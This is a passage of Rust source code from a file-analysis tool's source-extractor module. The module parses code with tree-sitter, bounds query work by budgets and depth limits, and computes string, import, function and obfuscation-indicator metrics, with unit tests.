//! Source-code extractors.
//!
//! Source files are parsed once with tree-sitter. The resulting tree
//! is cached on the [`ParsedFile`] and shared by every view that needs
//! it: typed symbol views read imports / functions / classes,
//! `strings` reads literal nodes, `metrics` reads the node count, and
//! `ast` reads the call-graph projection. No view ever causes a re-parse.
//!
//! [`ParsedFile`]: crate::ParsedFile

mod ast_walk;
mod call_target_metrics;
mod comment_metrics;
mod escapes;
mod go_syntax;
mod payload_flow;
mod value_flow;
pub use payload_flow::go_package_payload_flow;
mod rust_syntax;

/// Decode the escape sequences a parsed source string literal carries, so a
/// consumer sees the text the program will actually use rather than the way the
/// source spelled it.
///
/// Re-exported from the crate root because cleave maintains its own AST
/// string-literal corpus — the one `type: literal` rules match against — and has
/// to land on the same value this crate reports from `cleave facts literals`.
/// When those two disagree, a rule author who checks the facts (as the rule
/// guide instructs) sees a string that no rule they write can match.
pub fn decode_source_escapes(literal: &str) -> String {
    escapes::decode(literal)
}
mod function_metrics;
mod identifier_metrics;
mod import_metrics;
mod langs;
pub(crate) mod parse;
mod string_metrics;
mod text_metrics;

use crate::metric;
use crate::value_key;
use std::cell::Cell;
use std::ops::ControlFlow;
use std::time::{Duration, Instant};

use tree_sitter::{Node, Query, QueryCursor, StreamingIterator};

use crate::error::Error;
use crate::fileid::FileType;
use crate::output::{ExtractedString, MetricKey, Metrics, Strings, Values};

use langs::{Lang, QueryKind};
use serde_json::Value as JsonValue;

pub(crate) use parse::{TreeCache, TreeParse, TreeSitterDiagnostic};

/// Recursion bound shared by the payload- and value-flow evaluators, which
/// recurse once per syntax level they descend.
const MAX_FLOW_DEPTH: usize = 96;

fn named_children(node: Node<'_>) -> Vec<Node<'_>> {
    let mut cursor = node.walk();
    node.named_children(&mut cursor).collect()
}

// Tree-sitter's query match limit bounds simultaneous in-progress matches,
// protecting against recursive/ambiguous query triggers. Allow ordinary
// large source files more headroom while retaining a finite ceiling.
const SOURCE_QUERY_MATCH_LIMIT: u32 = 100_000;
const SOURCE_QUERY_BYTE_LIMIT: usize = 2 * 1024 * 1024;
const SOURCE_QUERY_OUTPUT_LIMIT: usize = 10_000;

/// Work budget for one query, counted in progress polls. tree-sitter polls
/// the query progress callback once per 100 cursor steps
/// (`OP_COUNT_PER_QUERY_CALLBACK_CHECK` in `query.c`), so the same tree always
/// stops at the same match, however loaded the machine is. The 250 ms
/// wall-clock budget this replaced fired on ordinary large files under load,
/// and the content-keyed disk cache then kept the truncated symbols.
///
/// Fixed rather than scaled: [`SOURCE_QUERY_BYTE_LIMIT`] already bounds how
/// much tree a query walks. The heaviest query over about 68k real source
/// files and generated 1–30 MiB sources took 40.6k polls (a minified bundle),
/// an eighth of this budget.
const SOURCE_QUERY_WORK_BUDGET: u64 = 500_000;

/// Deepest node at which a query pattern may start matching. Cursor steps
/// cost more as nesting deepens: tree-sitter keeps a partial match open for
/// every enclosing node a pattern could still complete at, and revisits each
/// of them on every step, so the cost of a query grows with the square of the
/// depth. 20k nested arrow functions took 14.6 s on one query while using 8k
/// polls, and a 1M-link Ruby or Elixir method chain ran for more than ten
/// minutes. With this cap the cursor stops descending once no partial match
/// needs it, and those inputs take at most about 0.1 s per query, even on a
/// heavily loaded machine.
///
/// The deepest match in the calibration corpus started at depth 227 (error
/// recovery over concatenated Swift), under a tenth of the cap. Trees deeper
/// than the cap are already past `ast_walk::MAX_AST_DEPTH`, so they are
/// reported as `ast.depth_capped`.
const SOURCE_QUERY_MAX_START_DEPTH: u32 = 2_500;

/// Wall-clock backstop for one query, separate from the work budget, set so
/// ordinary files never reach it. Steps are not equally expensive: the
/// cursor walks up through hidden grammar nodes on every step, so a 30 MiB
/// generated byte table (one array, millions of elements) took 20 s of CPU
/// per query within its usual 27k polls. Real source took at most 0.4 s.
///
/// What it does stop is input where each step is expensive while the step
/// count stays small: wide trees nested just under
/// [`SOURCE_QUERY_MAX_START_DEPTH`], and deeply nested hidden nodes (100k
/// nested Perl parentheses ran for minutes per query). Whether those stop
/// can depend on load.
const SOURCE_QUERY_WALL_BACKSTOP: Duration = Duration::from_secs(60);

fn source_query_cursor() -> QueryCursor {
    let mut cursor = QueryCursor::new();
    cursor.set_match_limit(SOURCE_QUERY_MATCH_LIMIT);
    cursor.set_max_start_depth(Some(SOURCE_QUERY_MAX_START_DEPTH));
    cursor
}

#[cfg(test)]
thread_local! {
    /// Work budget override in progress polls; `0` means
    /// [`SOURCE_QUERY_WORK_BUDGET`]. Thread-local so one test's tiny budget
    /// cannot cut short a query in another test running in parallel.
    static QUERY_WORK_OVERRIDE: Cell<u64> = const { Cell::new(0) };
}

fn query_work_budget() -> u64 {
    #[cfg(test)]
    if let polls @ 1.. = QUERY_WORK_OVERRIDE.get() {
        return polls;
    }
    SOURCE_QUERY_WORK_BUDGET
}

/// Progress-callback state for one query: counts polls against the work
/// budget, with the wall-clock backstop behind it.
struct QueryBudget {
    polls: Cell<u64>,
    budget: u64,
    deadline: Instant,
    exhausted: Cell<bool>,
}

impl QueryBudget {
    fn new() -> Self {
        Self {
            polls: Cell::new(0),
            budget: query_work_budget(),
            deadline: Instant::now() + SOURCE_QUERY_WALL_BACKSTOP,
            exhausted: Cell::new(false),
        }
    }

    fn poll(&self) -> ControlFlow<()> {
        self.polls.set(self.polls.get() + 1);
        if self.polls.get() > self.budget || Instant::now() >= self.deadline {
            self.exhausted.set(true);
            return ControlFlow::Break(());
        }
        ControlFlow::Continue(())
    }
}

// The dispatcher in `formats::extract` requires every format
// extractor to return `Result<(), Error>` even when the impl can't
// fail; uniformity is more valuable than removing one always-Ok arm.
#[allow(clippy::unnecessary_wraps)]
pub(super) fn extract(
    bytes: &[u8],
    _file_type: FileType,
    tree_cache: Option<&TreeCache<'_>>,
    values: &mut Values,
    strings: &mut Strings,
    metrics: &mut Metrics,
    symbols_out: &mut crate::Symbols,
) -> Result<(), Error> {
    let Some(cache) = tree_cache else {
        // Even without a parse, the byte stream still has language-agnostic
        // text features worth surfacing — emit `text.*` metrics from the
        // raw bytes when they decode as UTF-8.
        if let Ok(content) = std::str::from_utf8(bytes) {
            text_metrics::emit(content, metrics);
        }
        return Ok(());
    };
    let config = cache.config();
    let source = cache.source();
    let root = cache.tree().root_node();

    // Byte-level / line-level / whitespace text metrics — language-agnostic.
    text_metrics::emit(source, metrics);

    // Comment metrics use the language's comment style; no AST. Also
    // collects comment bodies into the comment-scoped string tier.
    comment_metrics::emit(source, config.comment_style, metrics, &mut strings.comments);

    extract_strings(root, source, config, strings);
    let (mut imports, import_libraries) = config
        .query(QueryKind::Imports)
        .map(|query| collect_imports(query, source, root))
        .unwrap_or_default();
    if config.lang == Lang::Rust {
        imports.items = rust_syntax::imports(root, source);
    }
    let functions = config
        .query(QueryKind::Functions)
        .map(|query| collect_query(query, source, root))
        .unwrap_or_default();
    let classes = config
        .query(QueryKind::Classes)
        .map(|query| collect_query(query, source, root))
        .unwrap_or_default();
    emit_query_limit_metrics(metrics, "imports", &imports);
    emit_query_limit_metrics(metrics, "functions", &functions);
    emit_query_limit_metrics(metrics, "classes", &classes);

    // Identifier metrics — walk the tree once, emit `identifiers.*`.
    let identifiers = identifier_metrics::collect_identifiers(root, source, config);
    identifier_metrics::emit(&identifiers, metrics);

    // String-literal metrics — operate on the literals we already
    // extracted into the `strings` view.
    let literal_refs: Vec<&str> = strings.literals.iter().map(|s| s.text.as_str()).collect();
    string_metrics::emit(&literal_refs, metrics);

    // Import metrics — feed the canonical language name so stdlib
    // classification works.
    let import_refs: Vec<&str> = imports.items.iter().map(|(n, _)| n.as_str()).collect();
    import_metrics::emit(&import_refs, config.lang, metrics);

    // Function metrics — single AST walk over function-definition nodes.
    let total_lines = source.lines().count() as u32;
    let functions_total = function_metrics::emit(root, source, config, total_lines, metrics);

    // Cross-component text ratios computed from the sub-metrics we just
    // emitted. Pure division — no extra parsing.
    emit_text_ratios(metrics, total_lines, functions_total, imports.items.len());

    // Push source-language imports / functions / classes into the
    // unified Symbols view. Python from-import members retain their owning
    // module, including its relative prefix. Module imports remain standalone
    // facts, preserving module-level matching alongside the member bindings.
    for (name, offset) in &imports.items {
        // Source-language aliased imports arrive as `module as local` (the raw
        // `aliased_import` node text). Split so the symbol name is the bare
        // module and the alias is a structured field — no whitespace in the
        // symbol, and trait authors can match the alias directly.
        let (bare, alias) = match name.split_once(" as ") {
            Some((module, local)) => (module.trim().to_string(), Some(local.trim().to_string())),
            None => (name.clone(), None),
        };
        symbols_out.push(crate::Symbol::Import {
            name: bare,
            alias,
            library: import_libraries.get(offset).cloned(),
            offset: Some(*offset),
            ordinal: None,
        });
    }
    if !functions.items.is_empty() {
        metrics.insert(
            metric!("source.function_count"),
            functions.items.len() as f64,
        );
    }
    for (name, offset) in &functions.items {
        symbols_out.push(crate::Symbol::Function {
            name: name.clone(),
            offset: Some(*offset),
            complexity: None,
            callees: Vec::new(),
        });
    }
    if !classes.items.is_empty() {
        metrics.insert(metric!("source.class_count"), classes.items.len() as f64);
    }
    // Class declarations surface as `Symbol::Function` too — the symbol
    // axis is "things declared here", regardless of function vs class.
    for (name, offset) in &classes.items {
        symbols_out.push(crate::Symbol::Function {
            name: name.clone(),
            offset: Some(*offset),
            complexity: None,
            callees: Vec::new(),
        });
    }

    values.insert_key(
        value_key!("source.language"),
        JsonValue::String(config.name().to_string()),
    );
    payload_flow::emit(root, source, config.lang, values);

    Ok(())
}

/// Walk the tree-sitter parse and push every `Symbol::Call`,
/// `Symbol::Member`, and `Symbol::Bind` into `symbols_out`. Replaces
/// the prior `build_ast` which materialised a separate `Ast` struct.
pub(crate) fn build_symbols(
    cache: &TreeCache,
    symbols_out: &mut crate::Symbols,
    metrics: &mut Metrics,
) {
    let config = cache.config();
    let source = cache.source();
    let root = cache.tree().root_node();
    ast_walk::walk(root, source, config, symbols_out, metrics);
    if config.lang == Lang::Rust {
        rust_syntax::resolve_calls(symbols_out);
    }
}

pub(crate) fn build_value_flow(cache: &TreeCache<'_>, symbols: &crate::Symbols) -> crate::Flow {
    value_flow::build(
        cache.tree().root_node(),
        cache.source(),
        cache.config(),
        symbols,
    )
}

/// The package clause of a parsed Go file, `""` when it has none, read from
/// the syntax tree alone. `None` for any other language.
pub(crate) fn go_package_name<'a>(ast: &crate::SourceAst<'a>) -> Option<&'a str> {
    (ast.file_type == FileType::Go)
        .then(|| go_syntax::package_name(ast.tree.root_node(), ast.source))
}

fn extract_strings(
    root: Node<'_>,
    source: &str,
    config: &langs::LangConfig,
    strings: &mut Strings,
) {
    let mut cursor = root.walk();
    // Each node travels with its parent's kind: `Node::parent` walks down
    // from the root, which would make this loop quadratic in tree depth.
    let mut stack: Vec<(Node<'_>, &str)> = vec![(root, "")];
    while let Some((node, parent_kind)) = stack.pop() {
        if config.string_kinds.contains(&node.kind()) {
            // Unquoted forms (heredoc bodies, Perl `q{…}`, Lua `[[…]]`) have
            // no quotes to strip, so this tier keeps their source text.
            if let Some(text) = decode_string_literal(node, source, config)
                .or_else(|| unquoted_literal(node, source).map(str::to_string))
            {
                strings.literals.push(ExtractedString {
                    text,
                    offset: node.start_byte(),
                    ..ExtractedString::default()
                });
            }
            continue;
        }
        // PowerShell command arguments are often unquoted barewords. The
        // grammar exposes `cdn.example/path` as a generic token rather than a
        // string literal, even though the command receives it as a string.
        // Promote only host/path-shaped tokens that are direct command
        // elements; ordinary identifiers and dotted member names stay out of
        // the precise literal tier.
        if is_protocolless_url_argument(node, parent_kind, source, config) {
            if let Ok(text) = node.utf8_text(source.as_bytes()) {
                strings.literals.push(ExtractedString {
                    text: text.to_string(),
                    offset: node.start_byte(),
                    ..ExtractedString::default()
                });
            }
        }
        for child in node.children(&mut cursor) {
            stack.push((child, node.kind()));
        }
    }
}

fn is_protocolless_url_argument(
    node: Node<'_>,
    parent_kind: &str,
    source: &str,
    config: &langs::LangConfig,
) -> bool {
    if config.lang != Lang::PowerShell
        || node.kind() != "generic_token"
        || parent_kind != "command_elements"
    {
        return false;
    }
    let Ok(value) = node.utf8_text(source.as_bytes()) else {
        return false;
    };
    looks_like_protocolless_url(value)
}

pub(super) fn looks_like_protocolless_url(value: &str) -> bool {
    if value.contains("://") || value.is_empty() {
        return false;
    }
    let Some((host, path)) = value.split_once('/') else {
        return false;
    };
    if host.is_empty() || path.is_empty() || host.starts_with('.') || host.ends_with('.') {
        return false;
    }
    let labels: Vec<&str> = host.split('.').collect();
    if labels.len() < 2
        || labels.iter().any(|label| {
            label.is_empty() || !label.chars().all(|c| c.is_ascii_alphanumeric() || c == '-')
        })
        || labels
            .last()
            .is_none_or(|tld| tld.len() < 2 || !tld.chars().all(|c| c.is_ascii_alphabetic()))
    {
        return false;
    }
    path.chars().all(|c| {
        c.is_ascii_alphanumeric()
            || matches!(c, '-' | '_' | '.' | '/' | '?' | '&' | '=' | '%' | '#')
    })
}

/// The value a quoted string literal denotes: any `b`/`r`/`f`/`u` prefix and
/// the quotes stripped, escapes decoded unless the literal is raw. Shared by
/// the literal tier, call arguments, subscript folding and value flow so all
/// of them agree on what `f"…"` or `b'…'` holds.
///
/// `None` when the node is not a complete quoted literal: an unterminated
/// one, or an unquoted form such as a heredoc body, Perl `q{…}` or Lua
/// `[[…]]`, whose text callers treat as they see fit.
fn decode_string_literal(
    node: Node<'_>,
    source: &str,
    config: &langs::LangConfig,
) -> Option<String> {
    let raw = node.utf8_text(source.as_bytes()).ok()?;
    if config.lang == Lang::Elixir && (raw.starts_with("\"\"\"") || raw.starts_with("'''")) {
        return escapes::decode_elixir_heredoc(raw);
    }
    let quoted = raw.trim_start_matches(is_string_prefix);
    let prefix = &raw[..raw.len() - quoted.len()];
    let open = quoted
        .chars()
        .next()
        .filter(|c| matches!(c, '"' | '\'' | '`'))?;
    let body = quoted[1..].strip_suffix(open)?;
    // A raw literal (Python `r"..."`, Rust `r#"..."#`, Go backticks) carries
    // the backslash as data, so decoding it would corrupt the value.
    let raw_literal = prefix.contains(['r', 'R'])
        || node.kind().contains("raw")
        || node.kind().contains("verbatim");
    if raw_literal {
        return Some(body.to_string());
    }
    Some(escapes::decode(body))
}

/// Source text of a string-kind node that has no opening quote at all, which
/// [`decode_string_literal`] leaves to its caller.
fn unquoted_literal<'s>(node: Node<'_>, source: &'s str) -> Option<&'s str> {
    let raw = node.utf8_text(source.as_bytes()).ok()?;
    let first = raw.trim_start_matches(is_string_prefix).chars().next()?;
    (!matches!(first, '"' | '\'' | '`')).then_some(raw)
}

fn is_string_prefix(c: char) -> bool {
    matches!(c, 'b' | 'B' | 'r' | 'R' | 'f' | 'F' | 'u' | 'U')
}

#[derive(Default)]
struct QueryCollection {
    items: Vec<(String, u64)>,
    /// The work budget ran out, or the wall-clock backstop fired. Reported
    /// under the historical `timeout` name ([`crate::QueryLimit::Timeout`]).
    timed_out: bool,
    match_limited: bool,
    output_limited: bool,
}

impl QueryCollection {
    fn limited(&self) -> bool {
        self.timed_out || self.match_limited || self.output_limited
    }
}

fn emit_query_limit_metrics(metrics: &mut Metrics, label: &str, result: &QueryCollection) {
    if !result.limited() {
        return;
    }
    metrics.insert(metric!("source.query_limited"), 1.0);
    metrics.insert(
        crate::source_query_limited(label, crate::QueryLimit::Any),
        1.0,
    );
    if result.timed_out {
        metrics.insert(
            crate::source_query_limited(label, crate::QueryLimit::Timeout),
            1.0,
        );
    }
    if result.match_limited {
        metrics.insert(
            crate::source_query_limited(label, crate::QueryLimit::Match),
            1.0,
        );
    }
    if result.output_limited {
        metrics.insert(
            crate::source_query_limited(label, crate::QueryLimit::Output),
            1.0,
        );
    }
}

fn collect_query(query: &Query, source: &str, root: Node<'_>) -> QueryCollection {
    let capture_names = query.capture_names();
    let mut cursor = source_query_cursor();
    cursor.set_byte_range(0..source.len().min(SOURCE_QUERY_BYTE_LIMIT));
    // De-duplicate by name, keeping the first (smallest) offset for
    // each. A repeated `import os` shows up once; the offset points
    // at its first occurrence, which is the most useful answer for
    // proximity-style matchers.
    let mut seen: std::collections::BTreeMap<String, u64> = std::collections::BTreeMap::new();
    let budget = QueryBudget::new();
    let output_limited = Cell::new(false);
    let mut progress_cb = |_: &tree_sitter::QueryCursorState| budget.poll();
    let options = tree_sitter::QueryCursorOptions::default().progress_callback(&mut progress_cb);
    {
        let mut matches = cursor.matches_with_options(query, root, source.as_bytes(), options);
        while let Some(m) = matches.next() {
            for cap in m.captures() {
                let name = capture_names.get(cap.index as usize).copied().unwrap_or("");
                if name.starts_with('_') {
                    continue;
                }
                if let Ok(text) = cap.node.utf8_text(source.as_bytes()) {
                    let cleaned = strip_quotes(text);
                    if cleaned.is_empty() {
                        continue;
                    }
                    let offset = cap.node.start_byte() as u64;
                    seen.entry(cleaned).or_insert(offset);
                    if seen.len() >= SOURCE_QUERY_OUTPUT_LIMIT {
                        output_limited.set(true);
                        break;
                    }
                }
            }
            if output_limited.get() {
                break;
            }
        }
    }
    QueryCollection {
        items: seen.into_iter().collect(),
        timed_out: budget.exhausted.get(),
        match_limited: cursor.did_exceed_match_limit(),
        output_limited: output_limited.get(),
    }
}

/// Collect import symbols, qualifying Python relative-import members with
/// their relative module prefix.
///
/// Tree-sitter records `from .pkg import name` as two separate captures: the
/// relative module (`.pkg`) and the imported member (`name`). The bare member
/// is indistinguishable from a top-level `import name`, so `from . import
/// requests` would otherwise masquerade as an import of the PyPI `requests`
/// library. Rejoining the member to its relative module (`.requests`,
/// `.pkg.requests`) keeps the symbol relative-prefixed: it counts as a
/// relative import and no library matcher anchored on `^name` matches a local
/// submodule. Non-relative imports and other languages pass through unchanged.
fn collect_imports(
    query: &Query,
    source: &str,
    root: Node<'_>,
) -> (QueryCollection, std::collections::HashMap<u64, String>) {
    let capture_names = query.capture_names();
    let mut cursor = source_query_cursor();
    cursor.set_byte_range(0..source.len().min(SOURCE_QUERY_BYTE_LIMIT));
    // Keep equal member names from distinct modules separate.
    let mut seen = std::collections::BTreeMap::new();
    let mut libraries = std::collections::HashMap::new();
    let budget = QueryBudget::new();
    let output_limited = Cell::new(false);
    let mut progress_cb = |_: &tree_sitter::QueryCursorState| budget.poll();
    let options = tree_sitter::QueryCursorOptions::default().progress_callback(&mut progress_cb);
    {
        let mut matches = cursor.matches_with_options(query, root, source.as_bytes(), options);
        while let Some(m) = matches.next() {
            for cap in m.captures() {
                let name = capture_names.get(cap.index as usize).copied().unwrap_or("");
                if name.starts_with('_') {
                    continue;
                }
                if let Ok(text) = cap.node.utf8_text(source.as_bytes()) {
                    let cleaned = strip_quotes(text);
                    if cleaned.is_empty() {
                        continue;
                    }
                    // Read alias fields structurally: Python permits tabs,
                    // repeated spaces and line continuations around `as`.
                    let cleaned = if cap.node.kind() == "aliased_import" {
                        match (
                            cap.node.child_by_field_name("name"),
                            cap.node.child_by_field_name("alias"),
                        ) {
                            (Some(module), Some(alias)) => format!(
                                "{} as {}",
                                module.utf8_text(source.as_bytes()).unwrap_or("").trim(),
                                alias.utf8_text(source.as_bytes()).unwrap_or("").trim()
                            ),
                            _ => cleaned,
                        }
                    } else {
                        cleaned
                    };
                    let qualified = qualify_relative_member(cap.node, cleaned, source);
                    let offset = cap.node.start_byte() as u64;
                    let library = python_import_library(cap.node, source);
                    if let Some(library) = &library {
                        libraries.insert(offset, library.clone());
                    }
                    seen.entry((qualified, library)).or_insert(offset);
                    if seen.len() >= SOURCE_QUERY_OUTPUT_LIMIT {
                        output_limited.set(true);
                        break;
                    }
                }
            }
            if output_limited.get() {
                break;
            }
        }
    }
    (
        QueryCollection {
            items: seen
                .into_iter()
                .map(|((name, _), offset)| (name, offset))
                .collect(),
            timed_out: budget.exhausted.get(),
            match_limited: cursor.did_exceed_match_limit(),
            output_limited: output_limited.get(),
        },
        libraries,
    )
}

/// The owner of a Python from-import member, never the module capture itself.
fn python_import_library(node: Node<'_>, source: &str) -> Option<String> {
    let parent = node.parent()?;
    if parent.kind() != "import_from_statement" {
        return None;
    }
    let module = parent.child_by_field_name("module_name")?;
    if module.id() == node.id() {
        return None;
    }
    Some(module.utf8_text(source.as_bytes()).ok()?.trim().to_string())
}

/// When `node` is the imported-member field of a Python relative
/// `import_from_statement` (`from .pkg import member`), return the member
/// joined to its relative module prefix (`.pkg.member`); otherwise return
/// `cleaned` unchanged. The relative module node itself already starts with
/// `.`, so it is left as-is, and absolute imports (`from os import path`) are
/// untouched because their `module_name` is a `dotted_name`, not a
/// `relative_import`.
fn qualify_relative_member(node: Node<'_>, cleaned: String, source: &str) -> String {
    if cleaned.starts_with('.') {
        return cleaned;
    }
    let Some(parent) = node.parent() else {
        return cleaned;
    };
    if parent.kind() != "import_from_statement" {
        return cleaned;
    }
    let Some(module) = parent.child_by_field_name("module_name") else {
        return cleaned;
    };
    if module.kind() != "relative_import" {
        return cleaned;
    }
    let Ok(prefix) = module.utf8_text(source.as_bytes()) else {
        return cleaned;
    };
    let prefix = prefix.trim();
    // `.`/`..` end in a dot already; `.pkg` needs a joining dot.
    if prefix.ends_with('.') {
        format!("{prefix}{cleaned}")
    } else {
        format!("{prefix}.{cleaned}")
    }
}

fn strip_quotes(s: &str) -> String {
    if let [first, inner @ .., last] = s.as_bytes()
        && first == last
        && matches!(first, b'"' | b'\'' | b'`')
    {
        return std::str::from_utf8(inner).unwrap_or(s).to_string();
    }
    s.to_string()
}

/// True when this file type is a source language filefacts can parse.
pub(crate) fn supports(file_type: FileType) -> bool {
    langs::config_for(file_type).is_some()
}

/// Resolve `file_type` to its tree-sitter [`Language`](tree_sitter::Language). Used by callers
/// that want to compile a tree-sitter query against the same grammar
/// filefacts uses internally — e.g. rule-engine load-time validation.
pub(crate) fn tree_sitter_language(file_type: FileType) -> Option<tree_sitter::Language> {
    langs::config_for(file_type).map(|config| (config.language)())
}

/// The file type of the language labelled `name`, the value published under
/// `values.source.language` (e.g. `"python"`, `"bash"`, `"objc"`).
pub(crate) fn file_type_for_language(name: &str) -> Option<FileType> {
    langs::file_type_named(name)
}

/// Emit text-level metrics (`text.*`) without a tree-sitter parse.
///
/// Called from the format dispatcher for text-like languages that
/// don't yet have a [`LangConfig`](langs::LangConfig) entry (Vbs, Batch, …). Only emits
/// the byte-level / line-level / whitespace metrics that don't need
/// an AST — language-agnostic by construction.
pub(crate) fn extract_text_only(bytes: &[u8], metrics: &mut Metrics) {
    if let Ok(content) = std::str::from_utf8(bytes) {
        text_metrics::emit(content, metrics);
    }
}

/// Compute cross-component ratios on `text.*` from already-emitted
/// sub-metrics (`identifiers.*` / `strings.*` / `comments.*` /
/// `functions.*` / `imports.*`). Pure division — no parsing.
fn emit_text_ratios(
    metrics: &mut Metrics,
    total_lines: u32,
    functions_total: usize,
    imports_total: usize,
) {
    let m = metrics.clone();
    let get = |key: MetricKey| m.get_key(&key).unwrap_or(0.0);

    // Counted by the caller: `functions.count` / `imports.count` are only
    // emitted later, from the unified symbols view.
    let functions_total = functions_total as f64;
    let strings_total = get(metric!("strings.count"));
    let identifiers_total = get(metric!("identifiers.count"));
    let identifiers_unique = get(metric!("identifiers.unique"));
    let imports_total = imports_total as f64;
    let functions_anonymous = get(metric!("functions.anonymous"));

    if functions_total > 0.0 {
        metrics.insert(
            metric!("text.strings_to_functions_ratio"),
            strings_total / functions_total,
        );
        metrics.insert(
            metric!("text.identifiers_to_functions_ratio"),
            identifiers_unique / functions_total,
        );
        if imports_total > 0.0 {
            metrics.insert(
                metric!("text.imports_to_functions_ratio"),
                imports_total / functions_total,
            );
        }
        if functions_anonymous > 0.0 {
            metrics.insert(
                metric!("text.anonymous_function_ratio"),
                functions_anonymous / functions_total,
            );
        }
    }

    if total_lines > 0 {
        let lines_f = f64::from(total_lines);
        if identifiers_total > 0.0 {
            metrics.insert(
                metric!("text.identifier_density"),
                identifiers_total / lines_f,
            );
        }
        if strings_total > 0.0 {
            metrics.insert(metric!("text.string_density"), strings_total / lines_f);
        }
        if imports_total > 0.0 {
            metrics.insert(
                metric!("text.import_density"),
                (imports_total * 100.0) / lines_f,
            );
        }
        let lines_sqrt = lines_f.sqrt();
        if lines_sqrt > 0.0 {
            if functions_total > 0.0 {
                metrics.insert(
                    metric!("text.normalized_function_count"),
                    functions_total / lines_sqrt,
                );
            }
            if imports_total > 0.0 {
                metrics.insert(
                    metric!("text.normalized_import_count"),
                    imports_total / lines_sqrt,
                );
            }
            if strings_total > 0.0 {
                metrics.insert(
                    metric!("text.normalized_string_count"),
                    strings_total / lines_sqrt,
                );
            }
        }
        let lines_log = lines_f.log2();
        if lines_log > 0.0 && identifiers_unique > 0.0 {
            metrics.insert(
                metric!("text.normalized_unique_identifiers"),
                identifiers_unique / lines_log,
            );
        }
    }

    // Obfuscation indicator ratios.
    if identifiers_unique > 0.0 {
        let suspicious = get(metric!("identifiers.hex_like_names"))
            + get(metric!("identifiers.base64_like_names"))
            + get(metric!("identifiers.sequential_names"))
            + get(metric!("identifiers.keyboard_pattern_names"))
            + get(metric!("identifiers.repeated_char_names"));
        if suspicious > 0.0 {
            metrics.insert(
                metric!("text.suspicious_identifier_ratio"),
                suspicious / identifiers_unique,
            );
        }
    }

    if strings_total > 0.0 {
        let encoded = get(metric!("strings.base64_candidates"))
            + get(metric!("strings.hex"))
            + get(metric!("strings.url_encoded"));
        if encoded > 0.0 {
            metrics.insert(
                metric!("text.encoded_string_ratio"),
                encoded / strings_total,
            );
        }
        let suspicious = get(metric!("strings.embedded_code_candidates"))
            + get(metric!("strings.shell"))
            + get(metric!("strings.sql"));
        if suspicious > 0.0 {
            metrics.insert(
                metric!("text.suspicious_string_ratio"),
                suspicious / strings_total,
            );
        }
    }

    let comments_total = get(metric!("comments.count"));
    if comments_total > 0.0 {
        let suspicious = get(metric!("comments.high_entropy")) + get(metric!("comments.base64"));
        if suspicious > 0.0 {
            metrics.insert(
                metric!("text.suspicious_comment_ratio"),
                suspicious / comments_total,
            );
        }
    }

    if imports_total > 0.0 {
        let dynamic = get(metric!("imports.dynamic"));
        if dynamic > 0.0 {
            metrics.insert(
                metric!("text.dynamic_import_ratio"),
                dynamic / imports_total,
            );
        }
    }
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn function_ratios_use_the_extracted_counts() {
        // These ratios read `functions.total` / `imports.total`, keys nothing
        // emits, so they never fired.
        let source =
            "import os\nimport sys\n\ndef a():\n    return 'x'\n\ndef b():\n    return 'y'\n";
        let parsed = crate::OpenOptions::new()
            .path(std::path::Path::new("m.py"))
            .open(source.as_bytes());
        let metrics = parsed.metrics();
        assert_eq!(
            metrics.get_key(&metric!("text.imports_to_functions_ratio")),
            Some(1.0)
        );
        assert!(
            metrics
                .get_key(&metric!("text.strings_to_functions_ratio"))
                .is_some()
        );
    }

    #[test]
    fn source_query_match_limit_allows_more_headroom_for_recursive_queries() {
        let cursor = source_query_cursor();
        assert_eq!(cursor.match_limit(), 100_000);
    }

    #[test]
    fn strip_quotes_handles_three_quote_kinds() {
        assert_eq!(strip_quotes("\"hello\""), "hello");
        assert_eq!(strip_quotes("'hello'"), "hello");
        assert_eq!(strip_quotes("`hello`"), "hello");
        assert_eq!(strip_quotes("hello"), "hello");
    }

    #[test]
    fn source_query_output_limit_records_metric() {
        fn javascript_language() -> tree_sitter::Language {
            tree_sitter_javascript::LANGUAGE.into()
        }

        let mut src = String::new();
        for i in 0..(SOURCE_QUERY_OUTPUT_LIMIT + 128) {
            if i > 0 {
                src.push(',');
            }
            src.push_str(&format!("u{i}"));
        }
        src.push_str(";\n");

        let mut parser = tree_sitter::Parser::new();
        parser
            .set_language(&javascript_language())
            .expect("javascript grammar");
        let tree = parser.parse(&src, None).expect("parse generated js");
        let query =
            Query::new(&javascript_language(), "(identifier) @name").expect("identifier query");
        let result = collect_query(&query, &src, tree.root_node());

        assert_eq!(result.items.len(), SOURCE_QUERY_OUTPUT_LIMIT);
        assert!(result.output_limited);
        let mut metrics = Metrics::new();
        emit_query_limit_metrics(&mut metrics, "identifiers", &result);
        assert_eq!(metrics.get("source.query_limited"), Some(1.0));
        assert_eq!(metrics.get("source.query_limited.identifiers"), Some(1.0));
        assert_eq!(
            metrics.get("source.query_limited.identifiers.output_limit"),
            Some(1.0)
        );
    }

    fn javascript_tree(src: &str) -> tree_sitter::Tree {
        let mut parser = tree_sitter::Parser::new();
        parser
            .set_language(&tree_sitter_javascript::LANGUAGE.into())
            .expect("javascript grammar");
        parser.parse(src, None).expect("parse generated js")
    }

    fn javascript_query(kind: QueryKind) -> &'static Query {
        langs::config_for(FileType::JavaScript)
            .and_then(|config| config.query(kind))
            .expect("javascript query")
    }

    /// Run `collect_query` with the work budget overridden to `polls`.
    fn collect_with_work_budget(
        query: &Query,
        src: &str,
        root: Node<'_>,
        polls: u64,
    ) -> QueryCollection {
        QUERY_WORK_OVERRIDE.set(polls);
        let result = collect_query(query, src, root);
        QUERY_WORK_OVERRIDE.set(0);
        result
    }

    /// The point of a work budget: a query that runs out stops at the same
    /// match every time, however loaded the machine is. Every step inside
    /// these nested calls is expensive (each enclosing call holds an open
    /// `require` match), the shape the old wall-clock budget cut short at a
    /// load-dependent point.
    #[test]
    fn query_work_budget_stops_at_the_same_point_every_time() {
        let src: String = (0..2_000)
            .map(|i| format!("{}require(\"m{i}\"){};\n", "a(".repeat(50), ")".repeat(50)))
            .collect();
        let tree = javascript_tree(&src);
        let imports = javascript_query(QueryKind::Imports);

        let full = collect_query(imports, &src, tree.root_node());
        assert!(!full.timed_out);
        assert_eq!(full.items.len(), 2_000);
        let first = collect_with_work_budget(imports, &src, tree.root_node(), 20);
        let second = collect_with_work_budget(imports, &src, tree.root_node(), 20);
        assert!(first.timed_out && second.timed_out);
        assert_eq!(first.items, second.items);
        assert!(!first.items.is_empty() && first.items.len() < full.items.len());
    }

    /// The calibration promise: queries over an ordinary file as large as
    /// the query byte range fit in a tenth of the work budget.
    #[test]
